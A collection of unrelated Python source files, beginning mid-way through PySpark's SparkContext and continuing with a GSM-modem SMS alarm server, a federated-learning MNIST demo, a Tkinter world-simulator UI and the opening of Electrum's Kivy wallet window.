... global result
... try:
... sc.setJobGroup("job_to_cancel", "some description")
... result = sc.parallelize(range(x)).map(map_func).collect()
... except Exception as e:
... result = "Cancelled"
... lock.release()
>>> def stop_job():
... sleep(5)
... sc.cancelJobGroup("job_to_cancel")
>>> suppress = lock.acquire()
>>> suppress = InheritableThread(target=start_job, args=(10,)).start()
>>> suppress = InheritableThread(target=stop_job).start()
>>> suppress = lock.acquire()
>>> print(result)
Cancelled
"""
self._jsc.setJobGroup(groupId, description, interruptOnCancel)
def setLocalProperty(self, key, value):
"""
Set a local property that affects jobs submitted from this thread, such as the
Spark fair scheduler pool.
Notes
-----
If you run jobs in parallel, use :class:`pyspark.InheritableThread` for thread-local
inheritance and to prevent resource leaks.
"""
self._jsc.setLocalProperty(key, value)
def getLocalProperty(self, key):
"""
Get a local property set in this thread, or null if it is missing. See
:meth:`setLocalProperty`.
"""
return self._jsc.getLocalProperty(key)
def setJobDescription(self, value):
"""
Set a human readable description of the current job.
Notes
-----
If you run jobs in parallel, use :class:`pyspark.InheritableThread` for thread-local
inheritance and to prevent resource leaks.
"""
self._jsc.setJobDescription(value)
def sparkUser(self):
"""
Get SPARK_USER for user who is running SparkContext.
"""
return self._jsc.sc().sparkUser()
def cancelJobGroup(self, groupId):
"""
Cancel active jobs for the specified group. See :meth:`SparkContext.setJobGroup`
for more information.
"""
self._jsc.sc().cancelJobGroup(groupId)
def cancelAllJobs(self):
"""
Cancel all jobs that have been scheduled or are running.
"""
self._jsc.sc().cancelAllJobs()
def statusTracker(self):
"""
Return :class:`StatusTracker` object
"""
return StatusTracker(self._jsc.statusTracker())
def runJob(self, rdd, partitionFunc, partitions=None, allowLocal=False):
"""
Executes the given partitionFunc on the specified set of partitions,
returning the result as an array of elements.
If 'partitions' is not specified, this will run over all partitions.
Examples
--------
>>> myRDD = sc.parallelize(range(6), 3)
>>> sc.runJob(myRDD, lambda part: [x * x for x in part])
[0, 1, 4, 9, 16, 25]
>>> myRDD = sc.parallelize(range(6), 3)
>>> sc.runJob(myRDD, lambda part: [x * x for x in part], [0, 2], True)
[0, 1, 16, 25]
"""
if partitions is None:
partitions = range(rdd._jrdd.partitions().size())
# Implementation note: This is implemented as a mapPartitions followed
# by runJob() in order to avoid having to pass a Python lambda into
# SparkContext#runJob.
mappedRDD = rdd.mapPartitions(partitionFunc)
sock_info = self._jvm.PythonRDD.runJob(self._jsc.sc(), mappedRDD._jrdd, partitions)
return list(_load_from_socket(sock_info, mappedRDD._jrdd_deserializer))
def show_profiles(self):
""" Print the profile stats to stdout """
if self.profiler_collector is not None:
self.profiler_collector.show_profiles()
else:
raise RuntimeError("'spark.python.profile' configuration must be set "
"to 'true' to enable Python profile.")
def dump_profiles(self, path):
""" Dump the profile stats into directory `path`
"""
if self.profiler_collector is not None:
self.profiler_collector.dump_profiles(path)
else:
raise RuntimeError("'spark.python.profile' configuration must be set "
"to 'true' to enable Python profile.")
def getConf(self):
conf = SparkConf()
conf.setAll(self._conf.getAll())
return conf
@property
def resources(self):
resources = {}
jresources = self._jsc.resources()
for x in jresources:
name = jresources[x].name()
jaddresses = jresources[x].addresses()
addrs = [addr for addr in jaddresses]
resources[name] = ResourceInformation(name, addrs)
return resources
@staticmethod
def _assert_on_driver():
"""
Called to ensure that SparkContext is created only on the Driver.
Throws an exception if a SparkContext is about to be created in executors.
"""
if TaskContext.get() is not None:
raise RuntimeError("SparkContext should only be created and accessed on the driver.")
def _test():
import atexit
import doctest
import tempfile
globs = globals().copy()
globs['sc'] = SparkContext('local[4]', 'PythonTest')
globs['tempdir'] = tempfile.mkdtemp()
atexit.register(lambda: shutil.rmtree(globs['tempdir']))
(failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
sys.exit(-1)
if __name__ == "__main__":
_test()
|
Server_COMPort.py
|
################### SMS SENDING SERVER SCRIPT ####################################################
# Execution syntax via cmd: python Server_COMPort.py
# Summary of operation:
# 1- To send SMS messages with an SMS modem, it must be plugged into the computer and initialized properly.
# In general, the recommended procedure is simply to open the manufacturer's software right after plugging in the modem, wait
# for it to initialize, and then close and exit the manufacturer's program. After this procedure the modem is usually
# ready to accept communication over the serial port. The port to use should be checked in the Device Manager
# on Windows, under COM PORTS. If the modem is supported and was correctly installed, one of the ports will have AT in its
# name, meaning it supports the AT commands used by this program.
# 2- This script solves the problem of concurrent access to the serial port (when many alarms fire at once) by creating a local
# TCP server listening on port 12345. So, to send an SMS, just connect via telnet to 127.0.0.1 (or "localhost")
# on port 12345 and send the string; the program then automatically sends the SMS to the list of numbers in the "Celulares.txt" file.
# 3- Messages are standardized to start with "Data Center\n" (the \n is a line break)
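# Minimal client sketch (assumes this server is already running locally and listening on
# 127.0.0.1:12345 as described above; the message text below is only an example). Any TCP
# client works, telnet included; the server echoes the received bytes back:
#
#   import socket
#   with socket.create_connection(("127.0.0.1", 12345)) as client:
#       client.sendall("Data Center\nAlarme: temperatura alta".encode())
#       print(client.recv(200))  # echo of the message just sent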
import socket
import serial
import time
import sys
import random      # used by Email() for the randomized retry delay
import subprocess  # used by Email() to invoke sendemail.exe
from threading import Thread
Cel_Numbers_Stack=[]
Messages_SMS_Stack=[]
mark=0
COM_Port="COM20"
Baud = 9600
Timeout = 5
Cel_Numbers = []
TCP_IP = '127.0.0.1'
TCP_PORT = 12345
BUFFER_SIZE = 200 # Normally 1024, but we want fast response
Message_SMS = ""
########################## START OF FUNCTION DECLARATIONS #########################################################################################################################
def SMS():
global Cel_Numbers_Stack
global Messages_SMS_Stack
global mark
timeout = time.time() + 3 # measured in seconds
while(1):
time.sleep(0.2)
if(mark):
timestr = time.strftime("%d/%m/%Y-%H:%M:%S")
log="DATA/HORA:"
log+=timestr
log+="---->"
log+="Fila surgiu! Mensagem responsavel:"
log+=Messages_SMS_Stack[0]
log+="\n"
file = open("logSMS-Server.txt","a")
file.write(log)
file.close()
try:
phone = serial.Serial(COM_Port, Baud, timeout=Timeout)
timestr = time.strftime("%d/%m/%Y-%H:%M:%S")
log="DATA/HORA:"
log+=timestr
log+="---->"
log+="Porta serial aberta com sucesso!"
log+="\n"
file = open("logSMS-Server.txt","a")
file.write(log)
file.close()
while(mark):
print("SMS Server: Ainda tem numeros na pilha!")
try:
time.sleep(0.5)
phone.write(b'AT\r')
time.sleep(0.5)
phone.write(b'AT+CMGF=1\r')
time.sleep(0.5)
phone.write(b'AT+CMGS=\"' + Cel_Numbers_Stack[0].encode() + b'\"\r')
time.sleep(0.5)
phone.write(Messages_SMS_Stack[0].encode() + b"\r")
time.sleep(0.5)
phone.write(bytes([26]))
time.sleep(2)
print("\nSMS Server: SMS enviado para: "+ Cel_Numbers_Stack[0])
timestr = time.strftime("%d/%m/%Y-%H:%M:%S")
log="DATA/HORA:"
log+=timestr
log+="---->"
log+="Envio de novo SMS: "
log+=Messages_SMS_Stack[0]
log+=" Para:"
log+=Cel_Numbers_Stack[0]
log+="\n"
file = open("logSMS-Server.txt","a")
file.write(log)
file.close()
del Cel_Numbers_Stack[0]
del Messages_SMS_Stack[0]
mark-=1
except:
if(time.time()>timeout):
# EMAIL ABOUT GSM MODEM FAILURE
try:
file=open("Emails.txt")
AddressesTo = file.read().splitlines()
file.close()
Message_Email_subject="Data Center: MODEM GSM"
Message_Email_body="Problemas no modem GSM ou falta do arquivo logSMS-Server.txt. No caso do modem GSM, por favor, reiniciar:\nPlugue o modem gsm usb DWM-221, abra a aplicacao da Dlink para inicializar o modem, depois, feche a aplicacao completamente. Talvez seja necessario clicar com o botao direito sobre o icone da dlink ao lado do relogio e escolher sair. Não existe impedimento sobre ter conectado usando o software, porém, é necessário fechá-lo para liberar a porta Serial. Isso não irá fechar a conexão de internet, caso tenha sido ativada."
SMTP_server="smtp.xxx.yyy.br"
Port="587"
Username="aaaa.ssss"
Password="xxxxxxx"
AddressFrom="alarme.datacenter@xxx.yyy.br"
Email(SMTP_server, Port, Username, Password, AddressFrom, AddressesTo, Message_Email_subject, Message_Email_body)
timestr = time.strftime("%d/%m/%Y-%H:%M:%S")
log="DATA/HORA:"
log+=timestr
log+="---->"
log+="Envio de email para REINICIALIZACAO DO MODEM GSM"
log+="\n"
file = open("logSMS-Server.txt","a")
file.write(log)
file.close()
mark=0
except: pass
print("\nSMS Server: Timeout de 1 hora de tentativas de envio de SMS, fim.")
timestr = time.strftime("%d/%m/%Y-%H:%M:%S")
log="DATA/HORA:"
log+=timestr
log+="---->"
log+="Timeout de 1 hora de tentativas de envio de SMS, todos com excecoes, fim da thread."
log+="\n"
file = open("logSMS-Server.txt","a")
file.write(log)
file.close()
mark=0
else:
continue
phone.close()
timestr = time.strftime("%d/%m/%Y-%H:%M:%S")
log="DATA/HORA:"
log+=timestr
log+="---->"
log+="Porta serial fechada com sucesso!"
log+="\n"
file = open("logSMS-Server.txt","a")
file.write(log)
file.close()
except:
if(time.time()>timeout):
# EMAIL ABOUT GSM MODEM FAILURE
try:
file=open("Emails.txt")
AddressesTo = file.read().splitlines()
file.close()
Message_Email_subject="Data Center: MODEM GSM"
Message_Email_body="Problemas no modem GSM ou falta do arquivo logSMS-Server.txt. No caso do modem GSM, por favor, reiniciar:\nPlugue o modem gsm usb DWM-221, abra a aplicacao da Dlink para inicializar o modem, depois, feche a aplicacao completamente. Talvez seja necessario clicar com o botao direito sobre o icone da dlink ao lado do relogio e escolher sair. Não existe impedimento sobre ter conectado usando o software, porém, é necessário fechá-lo para liberar a porta Serial. Isso não irá fechar a conexão de internet, caso tenha sido ativada."
SMTP_server="smtp.xxxx.yyyy.br"
Port="587"
Username="alarme.datacenter"
Password="xxxxx"
AddressFrom="alarme.datacenter@xxx.yyyy.br"
Email(SMTP_server, Port, Username, Password, AddressFrom, AddressesTo, Message_Email_subject, Message_Email_body)
timestr = time.strftime("%d/%m/%Y-%H:%M:%S")
log="DATA/HORA:"
log+=timestr
log+="---->"
log+="Envio de email para REINICIALIZACAO DO MODEM GSM"
log+="\n"
file = open("logSMS-Server.txt","a")
file.write(log)
file.close()
mark=0
except:
print("\nSMS Server: Timeout de 1 hora de tentativas de envio de SMS, fim.")
timestr = time.strftime("%d/%m/%Y-%H:%M:%S")
log="DATA/HORA:"
log+=timestr
log+="---->"
log+="Timeout de 1 hora de tentativas de envio de SMS, todos com excecoes, fim da thread."
log+="\n"
file = open("logSMS-Server.txt","a")
file.write(log)
file.close()
mark=0
else:
continue
continue
else: pass
# Function that sends the alerts to the email addresses listed in Emails.txt
def Email(SMTP_server, Port, Username, Password, AddressFrom, AddressesTo, Message_subject, Message_body):
Address_completo=""
for number,AddressTo in enumerate(AddressesTo):
Address_completo+=(AddressTo+"; ")
timeout = time.time() + 10 # measured in seconds
while(time.time() < timeout):
try:
time.sleep(random.uniform(1, 5))
comando=""
comando+="sendemail.exe -f "
comando+=AddressFrom
comando+=" -t "
comando+=Address_completo
comando+=" -s "
comando+=SMTP_server
comando+=":"
comando+=Port
comando+=" -xu "
comando+=Username
comando+=" -xp "
comando+=Password
comando+=" -o tls=auto -u \""
comando+=Message_subject
comando+="\" -m \""
comando+=Message_body
comando+="\""
subprocess.run(comando, shell=True)
print("\nEmail: Email enviado!")
timestr = time.strftime("%d/%m/%Y-%H:%M:%S")
log="DATA/HORA:"
log+=timestr
log+="---->"
log+="Email enviado: Subject:"
log+=Message_subject
log+=" / Body:"
log+=Message_body
log+="\n"
file = open("logSMS-Server.txt","a")
file.write(log)
file.close()
break
except:
print("\nEmail: Erro, repetindo...")
continue
timestr = time.strftime("%d/%m/%Y-%H:%M:%S")
log="DATA/HORA:"
log+=timestr
log+="---->"
log+="FALHA> email nao enviado: Subject:"
log+=Message_subject
log+=" Body:"
log+=Message_body
log+="\n"
file = open("logSMS-Server.txt","a")
file.write(log)
file.close()
return
########################## END OF FUNCTION DECLARATIONS #########################################################################################################################
########################## START OF MAIN PROGRAM ########################################################################################################################
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((TCP_IP, TCP_PORT))
s.listen(1)
#phone = serial.Serial(COM_Port, Baud, timeout=Timeout)
th=Thread(target=SMS , args = [] )
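# Worker thread: SMS() drains Cel_Numbers_Stack/Messages_SMS_Stack and sends each message through the GSM modem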
while(1):
conn, addr = s.accept()
print ('\nSMS Server: Connection address:', addr)
timestr = time.strftime("%d/%m/%Y-%H:%M:%S")
log="DATA/HORA:"
log+=timestr
log+="---->"
log+="Nova conexao recebida, endereco: "
log+=str(addr)
log+="\n"
file = open("logSMS-Server.txt","a")
file.write(log)
file.close()
data = conn.recv(BUFFER_SIZE)
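# str() of an empty bytes object is "b''", so the check below skips empty payloads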
if(data and str(data).find("b\'\'") == -1):
print ("\nSMS Server: Received data:", data)
conn.send(data) # echo
timestr = time.strftime("%d/%m/%Y-%H:%M:%S")
log="DATA/HORA:"
log+=timestr
log+="---->"
log+="Nova mensagem ainda nao processada recebida: "
log+=str(data)
log+="\n"
file = open("logSMS-Server.txt","a")
file.write(log)
file.close()
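# str(data) wraps the payload as b'...'; the slice below strips the leading b' and the trailing quote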
message=str(data)
message=str(message[2:-1])
#print(message)
Message_SMS = message
file=open("Celulares.txt")
Cel_Numbers = file.read().splitlines()
file.close()
if (not th.is_alive()):
for colocacao,Celphone in enumerate(Cel_Numbers):
mark+=1
Cel_Numbers_Stack.append(Celphone)
Messages_SMS_Stack.append(Message_SMS)
th.daemon=True
th.start()
timestr = time.strftime("%d/%m/%Y-%H:%M:%S")
log="DATA/HORA:"
log+=timestr
log+="---->"
log+="Nova thread iniciada! Mensagem que deu inicio: "
log+=Message_SMS
log+="\n"
file = open("logSMS-Server.txt","a")
file.write(log)
file.close()
else:
for colocacao,Celphone in enumerate(Cel_Numbers):
mark+=1
Cel_Numbers_Stack.append(Celphone)
Messages_SMS_Stack.append(Message_SMS)
timestr = time.strftime("%d/%m/%Y-%H:%M:%S")
log="DATA/HORA:"
log+=timestr
log+="---->"
log+="Thread ja estava ativa! Mensagem adicionada à pilha de envio: "
log+=Message_SMS
log+="\n"
file = open("logSMS-Server.txt","a")
file.write(log)
file.close()
except:
print("Excecao, fim do SMS Server.")
timestr = time.strftime("%d/%m/%Y-%H:%M:%S")
log="DATA/HORA:"
log+=timestr
log+="---->"
log+="FALHA> Excecao detectada, fim do SMS Server."
log+="\n"
file = open("logSMS-Server.txt","a")
file.write(log)
file.close()
sys.exit()
########################## END OF MAIN PROGRAM #########################################################################################################################
|
fl.py
|
import multiprocessing
import shutil
import pymongo
from os import path, mkdir
from time import time, sleep
import tensorflow as tf
from tensorflow.keras.models import load_model
from tensorflow.keras.datasets import mnist
from dFL.Peer.client import Client
from dFL.Peer.node import Node
from dFL.Utils.config import config
from dFL.MainServer.api import ControlServer
# Create the main server's database, dropping and recreating it if it already exists
def create_database():
name = config['database']['name']
ip = config['database']['ip']
port = config['database']['port']
db_client = pymongo.MongoClient(f"mongodb://{ip}:{port}")
if name not in db_client.list_database_names():
my_db = db_client[name]
else:
db_client.drop_database(name)
my_db = db_client[name]
my_db.create_collection("Nodes")
my_db.create_collection("Processes")
db_client.close()
# Create nodes and a process
def create_nodes(num_nodes, num_blocks):
nodes: list = []
process_id = 0
for i in range(num_nodes):
node = Node()
if i == 0:
# Create new FL Process
process_id = node.registration.create_process({
"num_blocks": num_blocks,
"start": time(),
"timeout": 600,
"file_extension": "csv"
})
node.registration.participate(process_id, f"http://127.0.0.1:{5001+i}", {'id': i})
nodes += [node]
return nodes
class DigitClassification:
def __init__(self, node_index: int, num_nodes: int):
self.ds_train, self.ds_val, self.ds_test = DigitClassification.load_data(node_index, num_nodes)
self.model = DigitClassification.build_model()
self.load_the_model()
@staticmethod
def load_data(node_index: int, num_nodes: int):
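# Each node trains on its own contiguous shard of MNIST; its share of the test set is split 25%/75% into validation and test data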
(x_train, y_train), (x_test, y_test) = mnist.load_data()
# Prepare training data
size_train = int(x_train.shape[0] / num_nodes)
start_train = node_index * size_train
x_train = x_train[start_train: (start_train + size_train)]
y_train = y_train[start_train: (start_train + size_train)]
# Prepare validation data
size_val = int(x_test.shape[0] / num_nodes * 0.25)
start_val = node_index * size_val
x_val = x_test[start_val: (start_val + size_val)]
y_val = y_test[start_val: (start_val + size_val)]
# Prepare testing data
size_test = int(x_test.shape[0] / num_nodes * 0.75)
start_test = start_val + size_val
x_test = x_test[start_test: (start_test + size_test)]
y_test = y_test[start_test: (start_test + size_test)]
return (x_train, y_train), (x_val, y_val), (x_test, y_test)
@staticmethod
def build_model():
model = tf.keras.models.Sequential([
tf.keras.layers.Flatten(input_shape=(28, 28)),
tf.keras.layers.Dense(128, activation='relu'),
tf.keras.layers.Dense(128, activation='relu'),
tf.keras.layers.Dense(10)
])
model.compile(
optimizer=tf.keras.optimizers.Adam(0.001),
loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),
metrics=[tf.keras.metrics.SparseCategoricalAccuracy()],
)
return model
def train_model(self, epochs: int = 1):
self.model.fit(x=self.ds_train[0], y=self.ds_train[1], epochs=epochs, validation_data=self.ds_val)
def get_model_parameters(self):
return self.model.get_weights()
def set_model_parameters(self, weights: list):
self.model.set_weights(weights)
def save_model(self):
self.model.save('models')
def load_the_model(self):
self.model = load_model(path.join(path.dirname(path.realpath(__file__)), 'models'))
def test_model(self):
loss, acc = self.model.evaluate(x=self.ds_test[0], y=self.ds_test[1])
return loss, acc
class FederatedLearning:
def __init__(self, node_id, process_id):
self.client = Client(node_id, process_id)
node_index = self.client.lookup[node_id]['index']
num_nodes = len(self.client.lookup)
self.classifier = DigitClassification(node_index, num_nodes)
self.train()
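# Wait so the other nodes can finish their local training before model updates are exchanged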
sleep(10)
self.start_fl()
def train(self):
self.classifier.train_model(20)
data = self.classifier.get_model_parameters()
self.client.store_blocks(data)
def start_fl(self):
loss_old, acc_old = self.classifier.test_model()
model_updates = self.client.run()
self.classifier.set_model_parameters(model_updates)
loss_new, acc_new = self.classifier.test_model()
print(f"{self.client.node_id} : Old model loss {loss_old}, acc {acc_old}")
print(f"{self.client.node_id} : New model loss {loss_new}, acc {acc_new}")
if __name__ == "__main__":
# Uncomment the lines below once to create and save the initial model
# ds = DigitClassification(0,10)
# ds.save_model()
# print()
control_server_process = multiprocessing.Process(target=ControlServer, daemon=True)
control_server_process.start()
sleep(3)
if path.exists(config['root_directory']):
shutil.rmtree(config['root_directory'])
mkdir(config['root_directory'])
create_database()
nodes_list = create_nodes(6, 6)
processes = []
for i in range(6):
processes += [multiprocessing.Process(target=FederatedLearning, args=(i, 0))]
processes[-1].start()
for pi in processes:
pi.join()
control_server_process.terminate()
|
world.py
|
from tkinter import *
from Simulator.Lyric.lyric import *
from Simulator.Me import *
# from Simulator.Render import *
from Simulator.Sound.sound import *
from Simulator.ui_logger import UiLogger
# from Simulator.PPT3D.PPT import *
from Simulator.PPT3D.ppt3d import Page, Frame as mFrame, PPT, PPT3D
import random
from PIL import Image
import multiprocessing
import cv2
import threading
import numpy as np
class World:
def __init__(self, root=None):
self.root = root
if self.root is None:
self.root = Tk()
self.title = 'World Simulator'
self.new_title(self.title)
# Some basic classes
self.spectrum_map = SpectrumMap()
self.spectrum_map_wave = SpectrumMap()
# self.spectrum = SpectrumMap()
self.lrc = Lyric()
self.sound = Sound()
# Build the window layout here
frame_left = Frame(self.root)
frame_right = Frame(self.root)
# Audio spectrum display
# im = self.spectrum_map.map(1024*10)
# imp = ImageTk.PhotoImage(image=im)
# self.voice = Label(frame_right, image=imp)
self.voice = Label(frame_right)
# self.voice.image = imp
self.voice.grid(row=1, column=0, sticky=W+E)
# What "Me" says
self.words = UiLogger(frame_right, title='I said', max_height=8)
self.words.logger().grid(row=2, column=0, sticky=W + E)
# My Status
self.status = UiLogger(frame_right, title='Status', max_height=10)
self.status.logger().grid(row=3, column=0, sticky=W + E)
# Program run log
self.log = UiLogger(frame_right, title='Logs', max_height=5)
self.log.logger().grid(row=4, column=0, sticky=W+E)
# Placeholder window
# self.span = UiLogger(frame_left, title='Simulation', max_height=22, width=600, height=300)
# self.span.logger().grid(row=1, column=1, sticky=W+E, columnspan=2)
self.span = LabelFrame(frame_left, text='Simulation', width=800+2, height=600+2)
self.span.grid(row=1, column=1, sticky=W + E, columnspan=2)
# Processing
self.processing = UiLogger(frame_left, title='Processing', max_height=5)
self.processing.logger().grid(row=2, column=1, sticky=W+E)
# Data
self.data = UiLogger(frame_left, title='Data', max_height=5)
self.data.logger().grid(row=2, column=2, sticky=W+E)
# frame_left.configure(width=600)
# frame_left['width'] = 600
frame_left.pack(side=LEFT)
frame_right.pack(side=RIGHT)
# im = self.spectrum_map.map(1024, clear=True)
# im.save('spectrum_map.png')
# Handle the 3D window
self.ppt = PPT()
page = Page()
page.frames.append(mFrame(image=Image.new("RGBA", (128, 128))))
page.position.load([random.random() * 6.8 for i in range(3)])
self.ppt.pages.append(page)
self.ppt3d = None
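# Run the OpenGL (PPT3D) main loop in a background daemon thread so the Tk UI stays responsive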
t = threading.Thread(target=self.gl_mainloop)
t.daemon = True
t.start()
# p = multiprocessing.Process(target=self.gl_mainloop)
# p.daemon = True
# p.start()
# self.thread()
t = threading.Thread(target=self.thread)
t.daemon = True
t.start()
self.sound.load()
self.sound.play()
self.lrc.start()
def new_title(self, title: str):
self.title = title
self.root.title(self.title)
# def thread(self):
# # self.logger.push(UiLogger.Item(random.randint(0, 4), 'create', 'World No.%s' % random.randint(0, 9999)))
# if self.lrc.has_new():
# self.logger.push(UiLogger.Item(UiLogger.LEVEL_INFO, 'Lyric', self.lrc.next()))
# self.root.after(10, self.thread)
def thread(self):
# def im_clear(x):
# if x == 255:
# return 0
# return x
im = SpectrumMap.blend(self.spectrum_map, self.spectrum_map_wave, 1024)
# im = self.spectrum.fetch(1)
im = im.resize((256, 140))
# imp = ImageTk.PhotoImage(image=im)
# self.voice.configure(image=imp)
# self.voice.image = imp
img = cv2.cvtColor(np.asarray(im), cv2.COLOR_RGB2BGR)
cv2.imshow('Voice', img)
cv2.waitKey(1)
if self.lrc.has_new():
self.words.push(UiLogger.Item(UiLogger.LEVEL_INFO, 'Lyric', self.lrc.next()))
# self.root.after(1, self.thread)
self.thread()
def title_manager(self):
pass
def mainloop(self):
self.root.mainloop()
def gl_mainloop(self):
self.ppt3d = PPT3D(self.ppt, window_size=(800, 600), pos=[self.root.winfo_x(), self.root.winfo_y()])
self.ppt3d.mainloop()
if __name__ == '__main__':
_world = World()
_world.mainloop()
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
from electrum.bitcoin import TYPE_ADDRESS
from electrum.storage import WalletStorage
from electrum.wallet import Wallet, InternalAddressCorruption
from electrum.paymentrequest import InvoiceStore
from electrum.util import profiler, InvalidPassword, send_exception_to_crash_reporter
from electrum.plugin import run_hook
from electrum.util import format_satoshis, format_satoshis_plain
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from electrum import blockchain
from electrum.network import Network
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# Register a widget cache to keep memory usage down; a timeout of 0 keeps
# the cached data forever.
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts; without this you won't be able to use bold/italic
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import (base_units, NoDynamicFeeEstimates, decimal_point_to_base_unit_name,
base_unit_name_to_decimal_point, NotEnoughFunds, UnknownBaseUnit,
DECIMAL_POINT_DEFAULT)
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'bitcoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def _get_bu(self):
decimal_point = self.electrum_config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
return decimal_point_to_base_unit_name(decimal_point)
except UnknownBaseUnit:
return decimal_point_to_base_unit_name(DECIMAL_POINT_DEFAULT)
def _set_bu(self, value):
assert value in base_units.keys()
decimal_point = base_unit_name_to_decimal_point(value)
self.electrum_config.set_key('decimal_point', decimal_point, True)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Can be one of `tablet` or `phone`.
:data:`orientation` is a read-only `AliasProperty`. Defaults to 'landscape'.
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
